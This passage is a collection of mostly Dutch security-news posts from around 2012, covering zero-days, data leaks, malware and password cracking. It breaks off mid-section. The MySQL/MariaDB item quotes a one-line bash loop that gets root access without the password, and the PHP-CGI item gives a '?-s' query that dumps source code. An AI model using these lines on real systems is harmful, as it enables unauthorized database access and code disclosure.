    Rechten
    "Het tekstwachtwoord is niet gebonden aan de PIN of het foto-wachtwoord, en is zodoende door elke gebruiker met adminrechten eenvoudig te achterhalen", aldus Passcape Software, dat programma's aanbiedt waarmee wachtwoorden zijn te achterhalen. 

    Gebruikers die het foto-wachtwoord willen gebruiken wordt dan ook geadviseerd om voorzichtig te zijn. "Als een account is geconfigureerd om het foto-wachtwoord of PIN te gebruiken, wordt je originele platte tekst wachtwoord op het systeem opgeslagen, en elke gebruiker met adminrechten heeft er dan toegang toe."

     

  • Een beveiligingsonderzoeker heeft een zero day-beveiligingsprobleem gevonden in versies 7 en 8 van Internet Explorer. De kwetsbaarheid wordt actief misbruikt, waardoor gebruikers van de browserversies gevaar lopen.

    Beveiligingsonderzoeker Eric Romang kwam het beveiligingsprobleem op het spoor tijdens een onderzoek naar een groep internetcriminelen die ook achter de recente zero day in Java zat. In een onbeveiligde folder op een server van de groep waren bepaalde bestanden te vinden die na analyse van Romang een zero day-exploitbleken te zijn: een beveiligingsprobleem dat nog niet eerder naar buiten is gekomen, en waar nog geen patch voor beschikbaar is.

    Romang plaatste een video waarin hij laat zien hoe een volledig bijgewerkte Windows XP-installatie zonder problemen geïnfecteerd kan worden. Of ook andere Windows-versies dan XP kwetsbaar zijn, is nog onbekend. Internet Explorer 7 is niet beschikbaar voor Windows 7, maar versie 8 wel. De nieuwste, niet door dit probleem getroffen getroffen IE-versie is Internet Explorer 9.

    De beheerders van de Metasploit-hackerstoolkit zullen de exploit maandag toevoegen. Daarmee lopen gebruikers van de twee browsers gevaar: het enige dat nodig is om besmet te worden, is naar een website surfen die de malware serveert, al dan niet bewust. Dit staat bekend als een 'drive-by download'.

    De beveiligingsonderzoeker stelt dat de groep die de zero day misbruikte, niet blij was dat hij deze op het spoor kwam: twee dagen nadat Romang de bestanden van de server downloadde, waren deze verdwenen. Volgens Security.nl zat dezelfde groep in 2011 achter aanvallen op chemische bedrijven.


    Bron: tweakers.net

  • DOS-attackMogelijk miljoenen websites zijn maandagavond niet langer op te vragen door een grootschalige ddos-aanval op dns-servers van hostingbedrijf en registrar GoDaddy. De aanval is opgeëist door een hacker die mogelijk banden heeft met Anonymous.

    De ddos-aanval begon maandagavond en was gericht op de dns-servers van hostingbedrijf en registrar GoDaddy. Sindsdien zijn een groot aantal websites onbereikbaar geworden. Het gaat mogelijk om miljoenen sites; het bedrijf heeft 52 miljoen sites in zijn dns-servers opgenomen en host tevens miljoenen websites. Via Twitter laat het bedrijf weten dat het probeert zijn systemen zo snel mogelijk weer in de lucht te krijgen. Dit zou op moment van schrijven deels weer het geval zijn.

    Een hacker die zich bedient van het alias AnonymousOwn3r heeft de verantwoordelijkheid voor de grootschalige ddos-aanval opgeëist. Via Twitter claimen andere personen die deel zeggen uit te maken van de losvaste groepering Anonymous dat het gaat om een eenmansactie. De hacker heeft dat inmiddels toegegeven, maar onduidelijk is nog of hij banden heeft met Anonymous.

    Hoster GoDaddy kreeg in de kringen van internetactivisten een slechte naam toen bleek dat het bedrijf een van de uitgesproken voorstanders was van de omstreden sopa-wetgeving. AnonymousOwn3r stelt echter dat hij geen afkeer heeft tegen GoDaddy an sich maar wil met zijn ddos-aanval onder andere niet nader omschreven problemen rond cybersecurity op de kaart zetten.

    bron: tweakers.net

  • java-securityOracle mag dan een noodpatch voor een ernstig beveiligingslek in Java 7 hebben uitgebracht, de aanvallen op ongepatchte gebruikers gaan in hoog tempo door. Na de Blackhole en RedKit exploit-kits, is de exploit voor het Java-lek in Java 7 update 6 en eerder ook in de Neosploit exploit-kit aangetroffen. Java-gebruikers worden met twee Java-applets bestookt. Het eerste Java-applet gebruikt een exploit voor CVE-2012-1723. Dit beveiligingslek werd in juni door Oracle gedicht. 

    Het tweede Java-applet probeert via beveiligingslek CVE-2012-4681 binnen te komen. Voor deze kwetsbaarheid verscheen afgelopen vrijdag een update. In beide gevallen wordt geprobeerd een nep-virusscanner op de computer te installeren, aldus Kahu Security

    E-mail
    Om slachtoffers naar besmette websites te lokken zetten de aanvallers ook e-mail in. Daarbij doen de aanvallers zich voor als salarisverwerker ADP. De e-mail meldt dat het digitale certificaat voor de ADP internet service binnenkort verloopt. Als de ontvanger het certificaat niet verlengt, kan men de diensten van ADP niet meer gebruiken. 

    De aanval werd begin augustus al waargenomen, maar gebruikte toen alleen nog een exploit voor het Java-lek uit juni. Inmiddels is daar volgens Panda Security ook het recente Java-lek aan toegevoegd.
  • Begin april verscheen er een bestand met 146 miljoen wachtwoord-hashes online, iemand heeft er daarvan nu 122 miljoen gekraakt. De MD5 en SHA1 wachtwoord-hashes waren verzameld door KoreLogic, met als doel het verbeteren van het onderzoek naar het kraken van wachtwoorden. Onderzoeker Pascal Clement wilde weten hoe ver hij zou komen als hij de MD5-hashes met zijn AMD Phenom II en ATI 5770 videokaart in combinatie met de kraakprogramma's John the Ripper en oclHashcat-plus zou kraken. 

    Uiteindelijk werden er dat 122 miljoen. Een verzameling van de gekraakte wachtwoorden werd verder geanalyseerd met het programma Pipal. Dan blijkt dat ruim een kwart van de wachtwoorden 7 karakters lang is en 65% niet langer dan 7 karakters. Slechts 5% is langer dan 11 karakters, terwijl lengte juist een belangrijke maatregel is om het kraken van wachtwoord-hashes te bemoeilijken. 

    Hashing
    "Dit was een tijdrovende en lastige opdracht, mede omdat ik niet over de snelste kaart beschik. Het hele kraakproces duurde zo'n vijf maanden om te voltooien, ook vanwege mijn studie naar de CCNP certificering", merkt Clement op. "De geleerde les is dat met een goed en slim woordenboek, gecombineerd met handige regels voor hashcat en John the Ripper zelfs de meest onmogelijke wachtwoorden zijn te kraken." 

    Clement zegt in zijn analyse dat systeembeheerders een sterker hashing algoritme met salt moeten gebruiken om wachtwoorden op te slaan. Ook adviseert hij thuisgebruikers om regelmatig hun wachtwoord te wijzigen. 

    Woordenlijsten
    "Wat opvalt is het gebruik van woordenlijsten waar ook zinnen in voorkomen. Waarschijnlijk is gezocht naar documenten en zijn alle zinnen hieruit opgenomen in de woordenlijst", zegt Frank van Vliet, CTO van Certified Secure tegenover Security.nl. 

    "Dit betekent niet dat het advies om passphrases te gebruiken onjuist is, maar het geeft wel aan dat het belangrijk is om een zin te kiezen die uniek is en dus niet in de woorden/zinnenlijsten voorkomt. Het gebruiken van een goede passphrase is voor de eindgebruiker nog steeds de beste manier om zich te beveiligen tegen deze aanvallen."
    Bron: www.security.nl

  • androidOp de grootste Android marktplaats in China is een Trojaans paard aangetroffen dat meer dan 500.000 Android-toestellen heeft geïnfecteerd om vervolgens via sms geld te stelen. De malware, SMSZombie genaamd, werd via de GFan marktplaats verspreid en zat in populaire wallpaper-apps verstopt. Volgens TrustGo dat SMSZombie op 25 juli in zeven verschillende apps detecteerde, beschikt de malware over geavanceerde mechanismen waardoor het lastig is te verwijderen. 

    Activatie
    Eenmaal geïnstalleerd probeert de malware administratorrechten te verkrijgen. Hiervoor activeert SMSZombie een nieuwe service, waarvoor het de gebruiker via een vervelend dialoogvenster om toestemming voor vraagt. Als de gebruiker annuleren klikt, verschijnt het dialoogvenster opnieuw 

    "Uiteindelijk wordt de gebruiker gedwongen om 'Activeren' te selecteren om zo het dialoogvenster te laten verdwijnen", aldus TrustGo. Vervolgens wordt er code geïnstalleerd die voorkomt dat de gebruiker de malware eenvoudig kan verwijderen. 

    Betaalmethode
    De malware maakt misbruik van een kwetsbaarheid in de sms-betaalmethode van de Chinese telecomgigant China Mobile, waardoor het ongeautoriseerde betalingen kan verrichten en bankkaartnummers en afschriften kan stelen.

    Bron: Security.nl

  • webcamHet is nog altijd een sport onder 'scriptkiddies' om slachtoffers van besmette computers via hun eigen webcam te begluren en opgenomen beelden op YouTube te plaatsen. Al in 2008 werden de reacties van slachtoffers op schokkende filmpjes opgenomen en later als leedvermaak online gezet. Symantec waarschuwt dat dit nog altijd gaande is. 

    De aanvallers besmetten hun slachtoffers met een RAT (Remote Access Tool) en hebben vervolgens volledige controle over de computer. Vervolgens krijgt het nietsvermoedende slachtoffer een "screamer" te zien, een afbeelding met gegil uit de film Excorcist, waarbij de reactie wordt vastgelegd. 

    YouTube
    Er is zelfs een apart YouTube-kanaal genaamd RAT Pwner waar verschillendevideo's zijn te zien. Een snelle zoektocht op YouTube levert nog meer soortgelijke video's van het gebruik van Remote Access Tools op. Daarbij gaat het niet alleen om het laten schrikken van slachtoffers, maar wordt er ook gekeken wat ze online allemaal uithalen

    Internetgebruikers krijgen het advies alleen betrouwbare programma's te installeren. Nooit anonieme linkjes in e-mail of instant messaging-berichten te vertrouwen en alleen maar programma's direct vanaf de website van de leverancier te downloaden.

    Bron: Security.nl

  • Het aantal aanvallen op poort 445 is het afgelopen kwartaal bijna verdubbeld. Dit poortnummer wordt gebruikt door Microsoft Directory Services. In het laatste kwartaal van 2011 kreeg poort 445 25% van alle aanvallen te verduren, terwijl dit in de eerste drie maanden van dit jaar naar 42% is opgelopen. Ook het aantal Telnet-aanvallen groeide ten opzichte van de vorige periode. Het aantal waargenomen aanvallen ging van 6,3% naar 11%, aldus internetbedrijf Akamai. 
    Het meeste aanvalsverkeer is volgens Akamai uit China afkomstig. Het land is goed voor 16% van alle aanvallen. Amerika (11%) en Rusland (7%) zijn samen goed voor 18% van alle aanvallen. De meeste aanvallen vanuit Europa worden geïnitieerd vanuit Duitsland. Onze oosterburen zijn goed voor 1,9% van al het wereldwijde aanvalsverkeer. Slechts 0,6% van de aanvallen kent zijn oorsprong in Nederland. 

    Nederland
    Het Akamai rapport laat verder zien dat Nederland in het eerste kwartaal van 2012 het Europese land is met gemiddeld de hoogste verbindingssnelheid: 8,8Mpbs. Een groei van 18% ten opzichte van het eerste kwartaal in 2011. 

    Wereldwijd hebben alleen Zuid-Korea, Japan en Hong Kong een hogere verbindingssnelheid dan Nederland. Ook is met 83% de adoptie van breedbandverbindingen in Nederland het hoogste van Europa.

    attacks on ports

    bron: security.nl

  • paspoortDe RFID-chip in het nieuwe Nederlandse paspoort is via gratis verkrijgbare software eenvoudig te kraken. Dat liet de Nederlandse beveiligingsonderzoeker Jeroen van Beek gisteren in De Telegraaf weten.

    De paspoortchip bevat onder meer de naam, geboortedatum, burgerservicenummer, foto en vingerafdrukken van de houder. Volgens Van Beek is de chip van korte afstand uit te lezen en te kopiëren. 
    Met deze gegevens zouden criminelen kunnen frauderen en zelfs de rekening van de pashouders kunnen leeghalen. Voor het kraken van de beveiliging van de chip is gratis software op internet te vinden, aldus de onderzoeker.

    Van Beek kraakte eerder al het Britse elektronische paspoort en ontwikkelde een tool om paspoortchips te klonen.

    Bron: www.security.nl

  • appleEen Russische hacker heeft een man-in-the-middle aanval gemaakt om de betaling van in-app aankopen na te maken. Daardoor lijkt het alsof de gebruiker betaalt, maar in feite gaat er niets van zijn iTunes-saldo af. De hack werkt zonder jailbreak. De hack werkt niet in alle apps met in-app aankopen, constateert 9to5 Mac. Sommige apps gebruiken een validatie voor in-app aankopen, waardoor de fraude niet kan plaatsvinden. De hack, die is ontdektdoor een Russische ontwikkelaar, vereist dat de gebruiker enkele profielen installeert en dns-instellingen wijzigt in de verbindingsinstellingen.

     

    Een jailbreak is niet vereist; de ontwikkelaar toont de hack op een iPhone 4S met iOS 6, waarvoor nog geen jailbreak publiekelijk beschikbaar is. De hack zou ook moeten werken op een iPad of iPod touch, met iOS-versies 3.x tot 6.0.

    De Russische ontwikkelaar heeft het proces van in-app betalingen reverse engineeredom de hack mogelijk te maken. In de interface is te zien dat bij een in-app aankoop een popup verschijnt van de ontwikkelaar, waarbij op Like gedrukt moet worden om de aankoop te bevestigen.

    Apple heeft nog niet gereageerd op deze kraak van zijn in-app aankoopproces. Het lijkt erop dat in-app aankopen bewaard blijven als de hack van het toestel wordt gehaald of aankopen op een ander iOS-toestel opnieuw gedownload worden. Het is niet aan te raden om de hack zelf uit te voeren: het gaat om een man-in-the-middle-proces en het is onduidelijk of de ontwikkelaar kwade bijbedoelingen heeft en op deze manier Apple ID-wachtwoorden van gebruikers kan onderscheppen.

    Bron: tweakers.net

  • YahooHackerscollectief D33Ds Company heeft namen en wachtwoorden van 453.000 accounts van Yahoo-diensten gepubliceerd. Waarschijnlijk zijn de hackers via een sql-injectie bij Yahoo Voice binnengekomen. De gegevens waren niet versleuteld.

    Een collectief van hackers dat zich de D33Ds Company noemt, heeft de gebruikersnamen en wachtwoorden van in totaal 453.492 Yahoo-accounts op zijn site geplaatst. Bij de gebruikersnamen gaat het niet alleen om Yahoo-e-mailadressen, maar ook om Gmail-, Live- en AOL-adressen. De hackers zijn binnengekomen via een sql-injectie bij een subdomein van Yahoo. Het collectief meldt niet om welke kwetsbaarheid en welk domein het gaat 'om verdere schade te voorkomen'.

    Uit de eveneens bij de publicatie vrijgegeven hostname 'dbb1.ac.bf1.yahoo.com' maakt beveiligingsbedrijf Trusted Sec echter op dat het waarschijnlijk om Yahoo Voice gaat. De accountnamen en wachtwoorden zouden onversleuteld opgeslagen zijn geweest. Naast de accountgegevens zijn ook meer dan 2700 table- en column-namen, en 298 MySQL-variabelen uit de gehackte database gepubliceerd. De authenticiteit van de hack is nog niet geverifieerd en Yahoo heeft nog niet gereageerd op de publicatie.

  • sql_injectionEen beveiligingsonderzoeker zal binnenkort demonstreren hoe hij via SQL Injection Netgear WiFi-routers kan overnemen. Zachary Cutlip van Tactical Network Solutions ontdekte tal van problemen met WiFi-routers die via SQL Injection zijn te misbruiken. In sommige gevallen blijken de apparaten de inloggegevens in een SQL Lite database op te slaan. Een aanvaller zou via SQL Injection zodoende zonder inloggegevens kunnen inloggen. Ook is het mogelijk om wachtwoorden in platte tekst te achterhalen en verborgen buffer overflows te misbruiken om root-level toegang te krijgen. 

    Veel details wil Cutlip voor de presentatie tijdens de Black Hat conferentie nog niet prijsgeven. Het gaat om een combinatie van kwetsbaarheden, waarbij een enkel SQL Injection-lek onbeduidend lijkt, maar gecombineerd met andere lekken tot een nieuw soort aanval kan leiden. 

    Hoewel de onderzoeker zich vooral op Netgear routers richt, speelt het probleem waarschijnlijk ook bij andere fabrikanten.
  • Internetgebruikers worden nog altijd massaal op internet gevolgd, met name door de Top 100 populairste websites op het web. Dat ontdekten onderzoekers van het Berkeley Center for Law and Technology van de universiteit van Californië. De Top 100 websites bleken in 2012 bij elkaar 5.795 cookies op de computers van bezoekers te plaatsen. Ruim 100 meer dan de 5.675 van de 2011 en de 3602 van 2009. 21 websites in de Top 100 laten meer dan 100 cookies achter terwijl zes sites zelfs de 150 passeren. 
    Het gebruik van Flash cookies nam dit jaar sterk af, terwijl het gebruik van HTML5 local storage juist verdubbelde. Doubleclick.net is de populairste third party tracker en werd op 73 van de top 100 websites aangetroffen. Scorecardresearch.com (58), adnxs.com (48), Quantserve.com (47) en ad.yieldmanager.com (42) volgen, zo blijkt uit de Web Privacy Census

    Privacy
    Via het onderzoek willen de onderzoekers in kaart brengen hoeveel trackers er actief zijn, welke trackers de grootste invloed op de privacy hebben, wat de populairste manier is om gebruikers te volgen en welke trends er plaatsvinden. Aan de hand van deze harde gegevens zijn vervolgens onderbouwde uitspraken over de toestand van internet tracking en privacy te maken. 

    Security.nl

  • marinus_kuivenhovenHet 'hacken' van mensen is nog altijd een zeer succesvolle manier voor aanvallers om interessante informatie te achterhalen, aldus ICT-dienstverlener Sogeti, dat zelf ook met social engineering te maken kreeg. Sogeti organiseerde tijdens Hack in the Box Amsterdam een social engineering wedstrijd waarbij deelnemers de Top 100 Nederlandse bedrijven moesten proberen te social engineeren.

    De social engineers moesten proberen om verschillende gegevens, zoals gebruikte PDF-lezer, browser, besturingssysteem, cateraar en schoonmaakbedrijf bij de nietsvermoedende slachtoffers los te peuteren. Deze informatie zou bijvoorbeeld voor een gerichte phishingaanval zijn te gebruiken. Aan de hand van de verklapte PDF-lezer of plug-ins zou een aanvaller een exploit kunnen ontwikkelen en via de e-mail meesturen. 

    Ondanks dat Sogeti de wedstrijd organiseerde, besloot het zichzelf ook als doelwit neer te zetten. Social engineer Marcel (interview) wist via slimme vragen voldoende informatie te achterhalen om uiteindelijk de wedstrijd te winnen. 

    Probleem
    "We kunnen niet zeggen hoe groot het probleem van social engineering is, daar zijn geen cijfers van", zegt Marinus Kuivenhoven, senior security specialist bij Sogeti. Hij wijst naar een trend waarbij aanvallen van het fysieke domein naar de netwerklaag gingen, om vervolgens naar de applicatielaag door te gaan. "Mochten we ooit applicatie, netwerk en fysieke beveiliging goed voor elkaar krijgen, dan blijven mensen die deze applicaties gebruiken de volgende laag die wordt aangevallen." 

    Kuivenhoven denkt dan ook dat social engineering in de toekomst een steeds groter probleem zal worden, maar dat we nu alvast lering kunnen trekken uit de problemen en oplossingen van de andere lagen. 

    De wedstrijd maakte duidelijk dat veel bedrijven in ieder geval weinig aandacht aan social engineering besteden, of het nu gaat om handhaving of bewustzijn bij het personeel. Alle "aangevallen" bedrijven krijgen toegang tot een lijst met aanbevelingen om hun beleid aan te passen in de vorm van een geanonimiseerde rapportage. Kuivenhoven merkt op dat in veel gevallen het beleid al beschreef hoe werknemers met bepaalde vragen om moesten gaan, maar dat het toch gebeurde dat er gegevens werden verstrekt. "Dan wordt het beleid niet nageleefd." 

    Nee zeggen
    Waar bedrijven vooral op moeten letten is dat werknemers leren om ook nee te kunnen zeggen. "Dat kwam het meeste naar voren tijdens de wedstrijd", laat de security expert weten. Het gaat dan om vragen die buiten de normale rol van het personeel valt. "Bijvoorbeeld aan HR-personeel vragen wat voor computer of besturingssysteem ze gebruiken. Dat valt buiten de normale rol van een HR-medewerker." Bedrijven zouden een whitelist kunnen opzetten van wat wel en niet binnen de informatievoorziening valt. 


    "Als het buiten de rol valt moeten mensen de informatie niet geven, of de beller doorzetten naar een persoon die met uitzonderingen omgaat." Voor personeel is het belangrijk dat er duidelijk gedefinieerde rollen komen. Binnen die rollen moeten mensen voor bepaalde informatie verantwoordelijk zijn. Deze verantwoordelijkheid zorgt ervoor dat mensen het beleid zich eigen maken, in tegenstelling tot veel awareness trainingen waarbij er geen direct raakvlakken met de dagelijkse werkzaamheden zijn. 

    Het probleem is dat veel mensen behulpzaam willen zijn en daardoor informatie prijsgeven die ze eigenlijk niet moeten weggeven. "Mensen moeten zich realiseren waarom en met welke reden iemand iets vraagt." Deze rolbewaking moet onderdeel van het proces worden, merkt Kuivenhoven op, net als met applicatiebeveiliging. "Het beveiligen van applicaties is geïntegreerd in het proces, dat wil je ook bij de mens." 

    Toch is niet alles met regels en beleid op te lossen. "Sommige zaken waar een social engineer gebruik van maakt zitten 'hard wired' in mensen, zoals het helpen van anderen. Daar kun je niets aan doen, zo zijn we geëvolueerd", merkt Kuivenhoven op. 

    Hackermentaliteit
    Bij een echte social engineering test wordt meestal meer tijd genomen om de context te bedenken dan bij de wedstrijd het geval was. Social engineer Marcel bedacht voor zichzelf een scenario en een omgeving waaruit hij de vragen stelde."Wij wilden zien wat er gebeurt als je iemand die er niets mee doet, maar wel de mindset heeft hoe je een applicatie of netwerk hackt, op een bedrijf loslaat. En dan zie je gewoon dat het lukt." 

    De hackermentaliteit is dan ook onmisbaar voor social engineers. "Je kijkt als hacker naar een proces of actor om te zien hoe het werkt en wat je er nog meer mee kunt doen. Dat was bij de wedstrijd ook het geval." 

    In tegenstelling tot een firewall waarbij je een regel kunt opstellen die niet wordt overtreden, is dat bij mensen niet mogelijk. Die kunnen beleid of regels naast zicht neerleggen. "Daar hebben we nog een grote uitdaging liggen", gaat Kuivenhoven verder. Het is echter de vraag of training en awareness alles kunnen oplossen. "Als awareness 100% werkt, zou je ook geen dikke mensen hebben die roken." 

    Om bedrijven nogmaals duidelijk te maken dat social engineering belangrijk is, zal Sogeti ook volgend jaar een social engineering wedstrijd tijdens Hack in the Box sponsoren. Daarbij wordt ook geprobeerd om vrouwen mee te laten doen, want die ontbraken nu. En dat terwijl vrouwen worden geacht betere social engineers te zijn.

    Bron: Security.nl

  • mysqlA serious security vulnerability has been found in MySQL and MariaDB that allows a remote attacker to gain root access to a database if they attempted to login (with the wrong password) around 256 times. The vulnerability, which was disclosed by Sergei Golubchik – the MariaDB Security Coordinator, occurs because some versions of memcmp() can return an arbitrary integer (outside of the normal -128 to 127 range).

    The problem is that when a user connects to MySQL or MariaDB, a hash of the password is used and compared with the sent password. But, because of a casting bug, sometimes the token and the expected password are considered equal even when they are not. This can happen if memcmp() returns a non-zero value. Because the authentication protocol uses random strings, the probability of hitting this bug is about 1 in 256.

    HD Moore, creator of Metasploit, has provided a simple one line bash script which will provide access to an affected MySQL server as the root user account, without actually knowing the password.

    $ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
    mysql>

    Of course to run the script you need to have shell access to the machine in question. All MySQL and MariaDB versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable. MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not affected. Neither are MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23.

    Some good news

    This is of course a massive security hole and Moore reckons that about 50 percent of Internet servers are vulnerable to the attack. However for systems which don’t open the MySQL port to the Internet then attackers won’t be able to access the MySQL database at all. Also many versions of Linux aren’t vulnerable due to the version of memcmp() they use. Since memcmp is part of the standard C library there are a variety of implementations. The gcc builtin version of memcmp() is safe, memcmp() in BSD’s libc is also safe. However Linux distributions that use glibc with sse-optimizations is not safe.

    This means that the following version of Linux are vulnerable:

    • Ubuntu Linux 64-bit ( 10.04, 10.10, 11.04, 11.10, 12.04 )
    • OpenSuSE 12.1 64-bit MySQL 5.5.23-log
    • Debian Unstable 64-bit 5.5.23-2
    • Fedora
    • Arch Linux

    It is worth noting that official builds of MySQL and MariaDB (including the Windows versions) are not vulnerable and that Red Hat Enterprise Linux 4, 5, and 6 and CentOS are also unaffected. Also the 32-bit versions of Ubuntu are not affected.

    Source: lifehacking.com

  • linkedin_logoLink is het populairste wachtwoord van LinkedIn-gebruikers van wie de wachtwoord-hash gekraakt is. Deze week verscheen een bestand met 6,5 miljoen wachtwoord-hashes van LinkedIn-gebruikers online. Daarvan is inmiddels een groot deel gekraakt, wat een overzicht van de Top 30 populairste LinkedIn-wachtwoorden oplevert. Na Link volgt 1234, work, god en job. Fuck, bitch en dick komen ook in het overzicht voor en dat is geen verstandig keuze, aldus beveiligingsbedrijf Rapid7 dat de Top 30 samenstelde. 

    Scheldwoorden zijn niet alleen zwak, ze kunnen ook erg gênant voor de eigenaar zijn als ze worden geopenbaard. "Dit soort wachtwoorden kunnen ervoor zorgen dat je LinkedIn moet gebruiken om een nieuwe baan te vinden!" Daarnaast zouden scheldwoorden boven brute-force woordenboeken staan, zo laat de beveiliger weten. 

    Waarschuwing
    Inmiddels heeft ook LinkedIn meer details over het wachtwoord-lek gegeven. Daarin verklaart de sociale netwerksite waarom het gebruikers niet direct waarschuwde. "Meteen toen we van de diefstal hoorden, zijn we een onderzoek begonnen om te bevestigen dat de wachtwoorden van LinkedIn-gebruikers zijn. Zodra dit bevestigd was, hebben we meteen het risico voor onze gebruikers in kaart gebracht", zegt Vicente Silveira. 

    Van gebruikers van wie de gelekte wachtwoord-hash was gekraakt werd het account uitgeschakeld. Vervolgens werden deze gebruikers via e-mail ingelicht. 

    Salt
    Daarnaast stelt Silveira dat de wachtwoorden van LinkedIn-gebruikers al voor het nieuws van het wachtwoord-lek waren gesalt. Bij salting wordt een waarde aan het wachtwoord toegevoegd en dit vervolgens gehasht, waardoor eerdere berekende hashes niet zijn te gebruiken. De gelekte LinkedIn-hashes zijn niet gesalt. 

    Dat zou kunnen betekenen dat de wachtwoorden voor het salten zijn gestolen of dat ze uit een oude back-up afkomstig zijn, zoals sommige experts vermoeden

    linkedin-top30

    Bron: www.security.nl

  • phpHet Internet Storm Center (ISC) waarschuwt dat een ernstig lek in PHP dat begin mei werd gepatcht, actief misbruikt wordt om servers mee aan te vallen. Het gaat om kwetsbaarheid CVE-2012-1823, die door de Nederlandse Capture The Flag-groep Eindbazen werd ontdekt. Via het lek is het mogelijk om willekeurige code op servers uit te voeren. 


    Al na het uitkomen van de update werd duidelijk dat het lek zeer interessant voor aanvallers is en werden de eerste aanvallen al waargenomen. Naast de waarschuwing maakte ISC-handler Manuel Humberto Santander Pelaez ook een analyse van de aanval die de aanvallers uitvoerden. Systeembeheerders die de update naar PHP 5.4.3 en PHP 5.3.13 nog niet hebben uitgevoerd, krijgen het advies dit alsnog te doen.
    Bron: Security.nl

     

  • php

    Php-installaties die middels een cgi-wrapper draaien, kunnen eenvoudig worden misbruikt. Op afstand kunnen argumenten aan het cgi-script worden toegevoegd, waardoor bijvoorbeeld code kan worden uitgevoerd of de broncode gedumpt.

    Omdat alleen php-installaties die een klassieke cgi-wrapper gebruiken kwetsbaar zijn, valt de impact mee: vaker wordt php als Apache-module of via fastcgi geconfigureerd. Wel gebruiken sommige shared hosting-providers nog de - overigens weinig efficiënte - cgi-wrappers.

    De ict-beveiligingsorganisatie van de Amerikaanse overheid waarschuwt dat hackers gevoelige informatie kunnen binnenhalen, een denial of servicekunnen veroorzaken of eigen code kunnen uitvoeren. Bovendien is er nog geen officiële oplossing voor het probleem, hoewel het php-team aan een patch zou werken.

    Kwetsbare php-installaties kunnen eenvoudig worden misbruikt: command line-argumenten kunnen als query string worden meegegeven. Om bijvoorbeeld de broncode van 'index.php' integraal uit te draaien, is het opvragen van '/index.php?-s' voldoende.

    De kwetsbaarheid is begin januari ontdekt door De Eindbazen, een groep beveiligingsonderzoekers. Aanvankelijk werd door de groep geheimhouding beloofd, maar toen een php-medewerker de bug-report per ongeluk integraal publiceerde, besloten De Eindbazen om hun ontdekkingen uit de doeken te doen. Tevens hebben ze twee patches vrijgegeven.

    Ook websites die onder php's safe_mode draaien, wat bij veel shared hosting-providers het geval is, zijn kwetsbaar als ze onder een cgi-wrapper draaien. Wel kunnen onder cgi5 bepaalde omgevingsvariabelen verhinderen dat er code wordt uitgevoerd - maar dat is volgens De Eindbazen eenvoudig te voorkomen.

    Opvallend is dat php tot 2004 ingebouwde beveiliging bevat om uitvoeren van code via de command line tegen te gaan, maar dat die naderhand is verwijderd. Tegelijkertijd doet de officiële documentatie van php nog steeds overkomen alsof die beveiliging is ingebouwd.

    Bron: Tweakers.net

  • skype-logoMicrosoft's Skype lekt de IP-adressen van gebruikers, een probleem dat de ontwikkelaars al anderhalf jaar negeren. Op Pastebin.com werd de kwetsbaarheid geopenbaard, die inmiddels ook via een eenvoudige webtool is te misbruiken. Onderzoekers uit Frankrijk en New York waarschuwden Skype in november 2010 al voor het beveiligingsprobleem. Het onderzoek werd vorig jaar oktober gepubliceerd en liet zien dat de onderzoekers de locatie van Skype-gebruikers konden achterhalen. Vorige week controleerde één van de onderzoekers of het probleem nog steeds aanwezig was, en dat bleek inderdaad zo te zijn. 
    In een reactie laat Skype weten dat het meldingen van een nieuwe tool om IP-adressen te achterhalen aan het onderzoeken is. "Door het een nieuwe tool te noemen hoeven ze niet zo snel te reageren", aldus onderzoeker Stevens Le Blond tegenover CIO Journal

    Spookgesprek
    De onderzoekers ontdekten dat ze Skype-gebruikers konden bellen, zonder dat er een pop-up venster verscheen of het gesprek in de belgeschiedenis zichtbaar werd. De gebruiker weet daardoor niet dat hij gebeld is en hoeft ook niet op te nemen om geïdentificeerd te worden. Aan de hand van de verstuurde pakketjes tijdens het 'spookgesprek' kunnen de onderzoekers het IP-adres achterhalen. 

    Bedrijfsspionage
    Door het proces elk uur te herhalen, is het mogelijk om de locatie van gebruikers te bepalen. Bedrijven zouden zo kunnen zien waar individuen van een concurrerend bedrijf zich bevinden. 

    "Je kunt dit opschalen om tienduizenden werknemers te volgen", aldus Keith Ross, die ook aan het onderzoeksrapport mee werkte. Le Blond laat weten dat het lek ook te gebruiken is als eerste stap voor het verder aanvallen van bedrijfscomputers of netwerken.

    Praktijk (Update Hackinfo)
    Een aangepaste SkypeKit, een "headless" versie van Skype, is nodig om een Ip adres te achterhalen. De dient skype-ip-finder.tk is offline gehaald. Wel staat de achterliggende python-code inmiddels op github: https://github.com/
    Gebruikersnaam invullen en je krijgt een IP-adres terug... 

    Bron: Security.nl

  • Op 8 mei geeft Valve het Perpetual Testing Initiative vrij, een gratis te downloaden pakket waarmee fans zelf maps kunnen maken voor Portal 2, de puzzelgame die het vorig jaar op de markt bracht. De maps kunnen via Steam worden gedeeld.

    Map editor Portal 2

    Het Perpetual Testing Initiative is een map-editor voor Valves Portal 2. Het is volgens de ontwikkelaar een 'simpele puzzelmaker' waarmee fans toch zelf levels kunnen maken vol 'mind-bending' puzzels. De editor is vanaf 8 mei te downloaden via Steam en is beschikbaar voor de Windows- en Mac OS X-versie van de game. De editor is niet beschikbaar voor de Xbox 360 en PlayStation 3. Valve kondigde de editor in oktober al aan.

    De maps kunnen vanuit de editor direct in de Steam Workshop geplaatst worden en zijn daarmee door andere spelers te downloaden. De Steam Workshop zelf is sinds februari beschikbaar en is bedoeld voor het up- en downloaden van door fans gemaakte mods en maps. Valve trapte de introductie van de Workshop af met een door de studio gemaakte mod voor The Elder Scrolls V: Skyrim.

    Bron: Tweakers.net

  • hotmail

    Microsoft heeft een lek in Hotmail gedicht waardoor het voor hackers mogelijk was om wachtwoorden te resetten.Dat meldt ZDnet.

    Onderzoekers van Vulnerability Lab ontdekten de fout op 6 april en waarschuwden Microsoft twee weken later. In verschillende Youtube-video's laten sommigen zien hoe ze te werk zijn gegaan.

    Hackers maakten naar verluidt gebruik van een Firefox add-on om http-verzoeken te onderscheppen en gegevens te wijzigen om het wachtwoordreset-systeem van Hotmail te omzeilen. Microsoft zegt dat de fout op 20 april meteen is hersteld, maar maakt niet bekend hoeveel van de 300 miljoen gebruikers getroffen zijn.

    Misbruik
